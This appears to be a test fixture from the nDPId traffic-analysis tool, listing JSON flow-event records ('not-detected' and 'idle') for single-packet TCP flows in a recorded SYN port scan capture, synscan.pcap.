-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 